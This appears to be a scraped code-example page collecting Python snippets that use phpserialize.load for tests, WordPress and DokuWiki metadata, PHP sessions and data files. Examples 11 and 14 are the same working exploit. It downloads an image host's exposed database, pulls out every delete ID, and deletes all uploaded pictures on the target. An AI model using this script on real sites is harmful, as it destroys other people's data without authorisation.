Ejemplo n.º 1
0
 def test_fileio_support_with_chaining_and_all(self):
     f = phpserialize.BytesIO()
     phpserialize.dump([1, 2], f)
     phpserialize.dump(42, f)
     f = phpserialize.BytesIO(f.getvalue())
     self.assertEqual(phpserialize.load(f), {0: 1, 1: 2})
     self.assertEqual(phpserialize.load(f), 42)
Ejemplo n.º 2
0
 def test_fileio_support_with_chaining_and_all(self):
     f = phpserialize.BytesIO()
     phpserialize.dump([1, 2], f)
     phpserialize.dump(42, f)
     f = phpserialize.BytesIO(f.getvalue())
     self.assertEqual(phpserialize.load(f), {0: 1, 1: 2})
     self.assertEqual(phpserialize.load(f), 42)
Ejemplo n.º 3
0
def _parse_postmeta(element):
    import phpserialize

    """
    Retrive post metadata as a dictionary
    """

    metadata = {}
    fields = element.findall("./{%s}postmeta" % WP_NAMESPACE)

    for field in fields:
        key = field.find("./{%s}meta_key" % WP_NAMESPACE).text
        value = field.find("./{%s}meta_value" % WP_NAMESPACE).text

        if key == "_wp_attachment_metadata":
            stream = StringIO(value.encode())
            try:
                data = phpserialize.load(stream)
                metadata["attachment_metadata"] = data
            except ValueError as e:
                pass
            except Exception as e:
                raise(e)

        if key == "_wp_attached_file":
            metadata["attached_file"] = value

    return metadata
Ejemplo n.º 4
0
def _parse_postmeta(element, metadata_keys=None):
    import phpserialize

    """
    Retrive post metadata as a dictionary
    """

    metadata = {}
    fields = element.findall("./{%s}postmeta" % WP_NAMESPACE)

    for field in fields:
        key = field.find("./{%s}meta_key" % WP_NAMESPACE).text
        value = field.find("./{%s}meta_value" % WP_NAMESPACE).text

        if metadata_keys and key in metadata_keys:
            metadata[key] = value
        if key == "_wp_attachment_metadata":
            stream = StringIO(value.encode())
            try:
                data = phpserialize.load(stream)
                metadata["attachment_metadata"] = data
            except ValueError as e:
                pass
            except Exception as e:
                raise(e)

        if key == "_wp_attached_file":
            metadata["attached_file"] = value

    return metadata
Ejemplo n.º 5
0
def read_dat(fname):
    """
    Read PHP serialized .dat file

    @param fname: str, filename
    @return: object structure
    """
    logging.debug('Reading data from: {0}'.format(fname))
    with open(fname, "r") as fh:
        data = load(fh, array_hook=OrderedDict, object_hook=object_hook)
    return data
Ejemplo n.º 6
0
def read_dat(fname):
    """
    Read PHP serialized .dat file

    @param fname: str, filename
    @return: object structure
    """
    logging.debug('Reading data from: {0}'.format(fname))
    with open(fname, "r") as fh:
        data = load(fh,
                    array_hook=OrderedDict,
                    object_hook=object_hook)
    return data
Ejemplo n.º 7
0
def analyze_profiling_result(base_name):
    data = None
    with open(base_name + ".xhprof_testing") as f:
        data = phpserialize.load(f)

    metadata = None
    with open(base_name + ".json") as f:
        metadata = json.load(f)

    storage.save_profiling_result(data, metadata)

    pprint.pprint(data)
    pprint.pprint(metadata)
Ejemplo n.º 8
0
def decode(data):
    fp = StringIO(data)
    r = {}
    while True:
        npos = data.find('|', fp.tell())
        if npos == -1:
            break
        k = data[fp.tell():npos]
        fp.seek(npos + 1)
        d = phpserialize.load(fp)
        try:
            if sorted(map(int, d.keys())) == range(len(d)):
                d = phpserialize.dict_to_list(d)
        except:
            pass
        r[k] = d
    return r
Ejemplo n.º 9
0
def filter_meta_file(path):
    with open(path, 'rb') as f:
        data = phpserialize.load(f)

    for key in [b'current', b'persistent']:
        if key in data and b'last_change' in data[key] and isinstance(
                data[key][b'last_change'],
                dict) and b'ip' in data[key][b'last_change']:
            if data[key][b'last_change'][b'ip'] != b'127.0.0.1':
                data[key][b'last_change'][b'ip'] = b'redacted-ip'

    output = io.BytesIO()
    phpserialize.dump(data, output)
    size = output.tell()
    output.seek(0)

    return output, size
Ejemplo n.º 10
0
	def GET(self, id, metric):
		try:
			job = db.jobs.find_one({"_id": bson.objectid.ObjectId(id)})
			for graph in job["Graphs"]:
				if graph["name"] == metric:
					return json.dumps(db.graphs.find_one({"_id": graph["graph"]}, {"_id": False, "job": False}), default=encode_datetime_to_javascript)
		except IOError:
			import phpserialize
			id = int(id)
			pointsDir = os.path.join(settings["graphsdir"], str(id%100), str(id/100%100), str(id))
			pointsDescFile = os.path.join(pointsDir, "pointsDescriptions")
			jobData = phpserialize.load(open(pointsDescFile))
			for graph in jobData.values():
				if graph["name"] == metric:
					pointGraph = os.path.join(pointsDir, "job.%d-point.%s.png"% (id, graph["point_id"]))
					break
			try:
				web.header("content-Type", "image/png")
				return open(pointGraph).read()
			except:
				pass
Ejemplo n.º 11
0
import urllib2

if __name__ == '__main__':
    if len(sys.argv) == 1:
        print "ERROR: Provide a valid URL"
        sys.exit(-1)
    url = sys.argv[1]

    ids = []

    try:
        print "[+] Target: {}".format(url)
        print "[+] Downloading the database..."
        response = urllib2.urlopen("{}/upload/data/imgdb.db".format(url))
        print "[+] Decoding database..."
        with open("imgdb.db.txt", "w+") as f:
            f.write(base64.b64decode(response.read()))
        print "[+] Finding pictues..."
        for key, value in phpserialize.load(file("imgdb.db.txt")).iteritems():
            ids.append(value.get('deleteid'))
        print "[+] Pictures found: {}".format(len(ids))
        print "[+] Ready... let's do this! Deleting all pictures..."
        for id in ids:
            urllib2.urlopen("{}/?d={}".format(url, id))
        print "[+] Done."

    except urllib2.URLError, ex:
        if ex.reason == "Forbidden":
            print "[-] ERROR: this version is not vulnerable."
    except EOFError, e:
        raise e
Ejemplo n.º 12
0
        # it has  >10 unicode characters
        data = re.sub('[^\x00-\x7f]', 'AA', data, count=6)  #TH
        data = re.sub('[^\x00-\x7f]', 'XXX', data, count=5)  #TH

    #default
    data = re.sub('[^\x00-\x7f]', 'XXX', data)

    if debug:
        print "PARSED", data
        find = re.search('[^\x00-\x7f]', data)
        if find:
            print "Find NON ASCII caracter '" + find.group(0) + "'"

    try:
        #data=re.sub('[^\x00-\x7f]','XXX',data)
        quest = php.load(StringIO(data))
    except ValueError:
        try:
            data = row[4]
            data = re.sub('[^\x00-\x7f]', 'XX', data)
            quest = php.load(StringIO(data))
        except ValueError:
            try:
                data = row[4]
                data = re.sub('[^\x00-\x7f]', 'XX', data, count=1)
                data = re.sub('[^\x00-\x7f]', 'XXX', data)
                quest = php.load(StringIO(data))
            except ValueError:
                try:
                    data = row[4]
                    data = re.sub('[^\x00-\x7f]', 'XXX', data, count=1)
import os
import sys
import phpserialize
from multiprocessing import Process
from network import Network

__DIR__ = os.path.dirname(os.path.abspath(__file__))

if len(sys.argv) != 2 or not sys.argv[1].isdigit():
    exit('usage: %s bucket' % sys.argv[0])

# read data file
infile = '%s/data/bucket-%03d.txt' % __DIR__
f = open(infile)
links = phpserialize.load(f)

edges = 0
for words in links.get('users').itervalues():
    edges += len(words)


def average_degree(network, alias, link_type):
    print "<%s> = %f" % (alias, network.average_degree(link_type))


def network_collaborative_similarity(network, alias, link_type, link_n_type):
    print "C_%s = %s" % (alias, network.network_collaborative_similarity(link_type, link_n_type, False))

def average_jaccard_similarity(network, alias, link_type, link_n_type):
    print "s_%s = %s" % (alias, network.average_jaccard_similarity(link_type, link_n_type, False))
Ejemplo n.º 14
0
import urllib2

if __name__ == '__main__':
    if len(sys.argv) == 1:
        print "ERROR: Provide a valid URL"
        sys.exit(-1)
    url = sys.argv[1]

    ids = []

    try:
        print "[+] Target: {}".format(url)
        print "[+] Downloading the database..."
        response = urllib2.urlopen("{}/upload/data/imgdb.db".format(url))
        print "[+] Decoding database..."
        with open("imgdb.db.txt", "w+") as f:
            f.write(base64.b64decode(response.read()))
        print "[+] Finding pictues..."
        for key, value in phpserialize.load(file("imgdb.db.txt")).iteritems():
            ids.append(value.get('deleteid'))
        print "[+] Pictures found: {}".format(len(ids))
        print "[+] Ready... let's do this! Deleting all pictures..."
        for id in ids:
            urllib2.urlopen("{}/?d={}".format(url, id))
        print "[+] Done."

    except urllib2.URLError, ex:
        if ex.reason == "Forbidden":
            print "[-] ERROR: this version is not vulnerable."
    except EOFError, e:
        raise e
Ejemplo n.º 15
0
update content set creator = (select user_key from user_mapping where lower_username = '******')
 where contentid in (select c2.contentid from content c2 where c2.title = '{1}'
                     and spaceid = (select spaceid from spaces where spacekey = '{2}'));
""".format(last_change_user, pagename, space)
    sql_script.write(sql_statement)


top_page = join(doku_data_path, 'pages')
for project_dir, subdirs, files in os.walk(top_page):
    for filename in files:
        if filename[-4:] == '.txt':
            pagename = filename.replace('_', ' ').strip()
            pagename = pagename[:-4]

            meta_file = (join(project_dir.replace('pages', 'meta'),
                              filename[:-4] + '.meta'))
            with open(meta_file, 'rb') as f:
                data = phpserialize.load(f)
            last_change_user = data[b'persistent'][b'last_change'][b'user']
            last_change_user = doku_confluence_user[last_change_user]

            save(pagename, last_change_user)

sql_script.close()

# Local Variables:
# compile-command: "python3 create-sql-script.py"
# End:

# vim:et:sw=4:ts=4:
Ejemplo n.º 16
0
import subprocess
import phpserialize
import StringIO

ENVIRONMENT_VARIABLE = "JOOMLA_CONFIGURATION"

try:
    configuration = os.environ[ENVIRONMENT_VARIABLE]
    if not configuration:  # If it's set but is an empty string.
        raise KeyError
except KeyError:
    # NOTE: This is arguably an EnvironmentError, but that causes
    # problems with Python's interactive help.
    raise ConfigurationNotFound(
        "Configuration cannot be loaded, because environment variable %s is undefined." % ENVIRONMENT_VARIABLE
    )

if not os.path.exists(configuration):
    raise ConfigurationNotFound("Configuration file could not be found in %s" % configuration)

path = os.path.abspath(os.path.join(os.getcwd(), configuration))

cmd = ["php", "-r", """include('%s'); $config = new JConfig; echo serialize($config);""" % path]
s = subprocess.Popen(cmd, stdout=subprocess.PIPE)
output, error = s.communicate()
s = StringIO.StringIO()
s.write(output)
s.seek(0)

jconfig = phpserialize.load(s, object_hook=phpserialize.phpobject)
Ejemplo n.º 17
0
 def load(self, fp=None):
     if fp:
         return phpserialize.load(fp, object_hook=phpserialize.phpobject)
     else:
         return phpserialize.load(self.fp, object_hook=phpserialize.phpobject)
                outfile_path = '%s/nodes/user-%09d.txt' % (__DIR__, user)
                with open(outfile_path, 'a') as outfile:
                    # file format:
                    # bucket C_u(i)
                    outfile.write("%d %f\n" % (int(sys.argv[1]), collaborative_similarity))
                nodes.task_done()
            except Empty:
                if nodes.empty():
                    self.stop()


if __name__ == '__main__':
    # read data file
    infile_path = '%s/data/bucket-%03d.txt' % (__DIR__, int(sys.argv[1]))
    with open(infile_path) as infile:
        links = phpserialize.load(infile)
    # create network
    network = Network(links)
    # create nodes queue
    nodes = JoinableQueue()
    # add tasks to queue
    for user, words in links.get('users').iteritems():
        nodes.put(user)
    # start as much processes as CPU has threads
    processes = cpu_count()
    print 'Starting %d processes...' % processes
    for x in xrange(0, processes):
        NetworkWorker(x).start()
    # wait for Queue to empty
    print 'Waiting to complete tasks...'
    nodes.join()
    sql_statement = """
update content set creator = (select user_key from user_mapping where lower_username = '******')
 where contentid in (select c2.contentid from content c2 where c2.title = '{1}'
                     and spaceid = (select spaceid from spaces where spacekey = '{2}'));
""".format(last_change_user, pagename, space)
    sql_script.write(sql_statement)

top_page = join(doku_data_path, 'pages')
for project_dir, subdirs, files in os.walk(top_page):
    for filename in files:
        if filename[-4:] == '.txt':
            pagename = filename.replace('_',' ').strip()
            pagename = pagename[:-4]

            meta_file = (join (project_dir.replace('pages', 'meta'), filename[:-4] + '.meta'))
            with open (meta_file, 'rb') as f:
                data = phpserialize.load(f)
            last_change_user = data[b'persistent'][b'last_change'][b'user']
            last_change_user = doku_confluence_user[last_change_user]

            save (pagename, last_change_user)

sql_script.close()

# Local Variables:
# compile-command: "python3 create-sql-script.py"
# End:

# vim:et:sw=4:ts=4: